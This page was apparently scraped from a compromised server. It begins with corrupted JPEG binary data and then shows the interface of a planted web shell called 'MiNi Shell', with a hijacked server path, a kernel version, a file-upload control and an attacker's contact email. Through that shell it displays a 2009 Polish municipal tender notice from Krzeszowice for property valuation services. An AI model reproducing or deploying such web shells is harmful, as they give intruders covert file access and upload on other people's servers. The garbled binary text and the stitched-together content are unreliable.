JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/50648-N-2009.html

<p class="kh_header"><b>Krzeszowice: WYKONANIE  W  2009r.  WYCEN  NIERUCHOMOŚCI  WYNIKAJĄCYCH 
Z  BIEŻĄCYCH  POTRZEB  GMINY</b><br>
<b>Numer ogłoszenia: 50648 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Krzeszowicach , ul. Ogrodowa 1, 32-065 Krzeszowice, woj. małopolskie, tel. 012 2520855, faks 012 2520802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krzeszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE  W  2009r.  WYCEN  NIERUCHOMOŚCI  WYNIKAJĄCYCH 
Z  BIEŻĄCYCH  POTRZEB  GMINY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1.	Przedmiot niniejszego zamówienia stanowi wykonanie w 2009r. wycen nieruchomości wynikających z bieżących potrzeb Gminy..
4.2.	Wspólny Słownik Zamówień (CPV) przedmiot główny:  71.31.90.00-7
4.3.	W ramach zmówienia Wykonawca podejmie się w szczególności:
4.3.1.	Sporządzania wyceny działek gruntowych, nieruchomości lokalowych i budynkowych.
4.3.2.	Sporządzania wyceny nieruchomości przeznaczonych na drogi składających się z kilku działek
4.3.3.	Sporządzania wyceny dla obiektów budowlanych. 
4.3.4.	Sporządzania wyceny dla lokali mieszkalnych w budynku wraz z ustaleniem wartości 
1 m2 gruntu w działce pod budynkiem, w którym jest wyceniany lokal/lokale mieszkalne 
oraz z częściami przynależnymi (piwnica, strych, klatka schodowa itp.).
4.3.5.	Sporządzania waloryzacji udzielonej bonifikaty przy sprzedaży lokalu mieszkalnego na dzień sprzedaży lokalu mieszkalnego przez najemcę - nabywcę.
4.3.6.	Sporządzania wyceny dla lokalu użytkowego.
4.3.7.	Sporządzania wyceny za wzrost wartości nieruchomości w związku ze zmianą planu zagospodarowania przestrzennego (ustalenie wartości nieruchomości z przed aktualizacji planu zagospodarowania przestrzennego Gminy i po jego aktualizacji).
4.3.8.	Sporządzania wyceny nieruchomości gruntowej w celu ustalenia odszkodowania za działki gruntu lub parcele katastralne wydzielone lub zajęte pod drogi, które z mocy prawa przeszły na własność Gminy ( w oparciu o art. 73 Ustawy z dnia 13.10.1998 przepisy wprowadzające ustawy, reformujące administrację publiczną Dz.U. z 1998r. Nr 133, poz. 872 ze zm.).
4.3.9.	Sporządzania wyceny ustalenia wartości rynkowej działki będące w użytkowaniu wieczystym do przekształcenia prawa użytkowania wieczystego w prawo własności lub do sprzedaży prawa użytkowania wieczystego.
4.3.10.	Sporządzania aktualizacji operatu szacunkowego - za jedną działkę, dla której wykonuje się aktualizację:
4.3.11.	Podanie przybliżonej wartości działki w formie pisemnej do celów informacyjnych za każdą działkę objętą zleceniem.
4.3.12.	Sporządzania wyceny służebności gruntowej ustalanej na rzecz Gminy lub na rzecz osób fizycznych.
4.3.13.	Sporządzanie innych wycen, w szczególności na potrzeby prowadzonych przez Zamawiającego postępowań sądowych.
4.3.14.	Sporządzenie opinii nie stanowiącej operatu szacunkowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 11.1.Wysokość wadium - każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 1.000,00 zł (słownie: jeden tysiąc złotych )
11.2.Forma wadium. 
11.2.1. Wadium może być wniesione w następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007, Nr 42, poz. 275, z późn. zm.).
        Wadium wnoszone w ww formach musi być opatrzone adnotacją: Wykonanie w 2009r. wycen nieruchomości wynikających z bieżących potrzeb Gminy.
11.2.2 W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
- nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
- kwotę gwarancji,
- termin ważności gwarancji
- określenie wierzytelności, która ma być zabezpieczona gwarancją,
- zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
odmówił podpisania umowy na warunkach określonych w ofercie, lub nie wniósł zabezpieczenia należytego wykonania umowy, lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
11.2.3. Postanowienia pkt 11.2.2. stosuje się odpowiednio do poręczeń, określonych powyżej w pkt. 11.2.1b) i 11.2.1.e)
11.3. Miejsce i sposób wniesienia wadium. 
          Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek   
          Zamawiającego: Urząd Miejski w Krzeszowicach, Bank Ochrony Środowiska S.A. 
          Oddział Kraków nr konta 60 1540 1115 2001 6000 1414 0001 
          
          Kopię polecenia przelewu należy dołączyć do oferty.
          Wadium wniesione w formie innej niż pieniężnej należy dołączyć do złożonej oferty.

11.4. Termin wniesienia wadium.
 Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu, za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
11.5. Zwrot wadium.
         Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46  Ustawy.  
11.6. Utrata wadium. 
           Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
                została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na wezwanie nie złożył dokumentów lub oświadczeń, lub pełnomocnictw chyba, że udowodnił, że wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 9.1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
9.1.1. posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 Ustawy. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
9.1.1.1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
9.1.1.2.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do niniejszego SIWZ.
9.1.2. Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki: wykonanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w przeciągu jednego roku, dla jednostki samorządu terytorialnego zamówienia o podobnym zakresie i o wartości łącznej min 30 tys. zł., z podaniem wartości przedmiotu, dat wykonania i zamawiających oraz załączenie dokumentów potwierdzających, że usługi zostały wykonane należycie.
9.1.2.1.W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (referencje).
9.1.2.2.Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi zostały wykonane należycie (referencje), zawierały, co najmniej:
9.1.2.2.1.Wskazanie wykonawcy usługi,
9.1.2.2.2.wskazanie podmiotu, na rzecz którego realizowane były usługi,
9.1.2.2.3.wskazanie zakresu usług,
9.1.2.2.4.wskazanie wartości usług za jakie Wykonawca był odpowiedzialny 
9.1.2.2.5.wskazanie daty wykonania (rozpoczęcia i zakończenia),
9.1.2.2.6.wskazanie miejsca wykonania,
9.1.2.2.7.opinię, że usługi zostały wykonane należycie
9.1.3. znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   niniejszego zamówienia. W szczególności Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej tj. w zakresie objętym niniejszym przetargiem.
9.1.3.1.W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
9.2. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w: pkt. 9.1.1. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
9.2.1. nie otwarto jego likwidacji ani nie ogłoszono upadłości;
9.2.2. nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
9.3. Stosownie do treści § 2 ust. 2 powołanego powyżej rozporządzenia Prezesa Rady Ministrów, dokumenty, o których mowa powyżej w pkt 9.2.1. oraz 9.2.2. powinny być wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.4. Ocena spełniania warunków zostanie dokonana wg formuły:spełnia-nie spełnia
10. Wykonawcy wspólnie ubiegający się udzielenie zamówienia.
10.1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni wspólnie (z wyłączeniem pkt 9.1.1., który musi spełniać każdy z osobna) spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 IDW. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (pełnomocnictwo winno być zabezpieczone odpowiednią opłatą skarbową).
10.2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
10.3.Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejsza, przed podpisaniem umowy o realizacje zamówienia, są zobowiązani przedstawić Zamawiającemu umowę regulującą zasady współpracy pomiędzy nimi..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> opis powyżej, przy warunkach.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krzeszowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krzeszowicach, ul Grunwaldzka 4, pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 08:30, miejsce: Ofertę należy złożyć na Dzienniku Podawczym Urzędu Miejskiego w Krzeszowicach, ul. Grunwaldzka 4,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com